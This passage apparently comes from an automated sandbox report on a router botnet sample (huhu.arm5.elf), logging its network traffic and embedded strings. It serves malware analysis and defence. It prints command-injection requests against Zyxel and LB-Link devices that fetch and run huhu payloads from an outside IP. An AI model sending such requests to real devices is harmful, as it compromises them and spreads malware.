            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 688X-Iinfo: 14-25398442-0 0NNN RT(1706851263338 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 34 2d 32 35 33 39 38 34 34 32 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 36 38 35 31 32 36 33 33 33 38 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 31 39 31 32 39 31 38 35 38 33 35 39 35 31 31 38 32 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 31 39 31 32 39 31 38 35 38 33 35 39 35 31 31 38 32 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=14-25398442-0%200NNN%20RT%281706851263338%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-119129185835951182&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-119129185835951182</iframe></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CradlepointHTTPService/1.0.0Content-Type: text/html; charset=UTF-8Date: Fri, 02 Feb 2024 05:21:39 GMTContent-Length: 69Data Raw: 3c 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 34 30 33 3a 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 62 6f 64 79 3e 34 30 33 3a 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><title>403: Forbidden</title><body>403: Forbidden</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: huhu.arm5.elfString found in binary or memory: http://103.180.149.156/huhu.mips;$
            Source: huhu.arm5.elfString found in binary or memory: http://103.180.149.156/huhu.mpsl;
            Source: huhu.arm5.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: huhu.arm5.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
